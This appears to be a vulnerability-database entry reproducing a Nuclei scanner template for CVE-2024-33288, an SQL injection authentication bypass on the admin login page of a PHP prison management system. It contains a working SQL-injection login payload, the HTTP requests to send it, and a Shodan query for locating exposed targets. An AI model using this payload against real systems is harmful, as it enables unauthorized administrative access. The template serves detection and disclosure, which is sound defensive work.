Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-33288HistoryMay 16, 2024 - 8:56 a.m.
Prison Management System - SQL Injection Authentication Bypass
2024-05-1608:56:24
ProjectDiscovery
github.com
12
prison management system
sql injection
authentication bypass
cve2024
vulnerability
exploit
web security
AI Score
6.8
Confidence
High
Sql injection vulnerability was found on the login page in Prison Management System
id: CVE-2024-33288
info:
name: Prison Management System - SQL Injection Authentication Bypass
author: Kazgangap
severity: high
description: |
Sql injection vulnerability was found on the login page in Prison Management System
reference:
- https://en.0day.today/exploit/39610
- https://www.sourcecodester.com/sql/17287/prison-management-system.html
metadata:
verified: true
max-request: 2
shodan-query: title:"Prison Management System"
tags: cve,cve2024,cms,sqli
http:
- raw:
- |
POST /Admin/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=
- |
GET /Admin/index.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "<p>Change Password</p>"
- "<p>Logout</p>"
- "Admin Dashboard | Prison Management system"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950Related
zdt
zdt
Prison Management System - SQL Injection Authentication Bypass Vulnerability
2024-05-13 00:00:00
packetstorm
packetstorm
Prison Management System Using PHP SQL Injection
2024-05-14 00:00:00
exploitdb
exploitdb
Prison Management System - SQL Injection Authentication Bypass
2024-05-13 00:00:00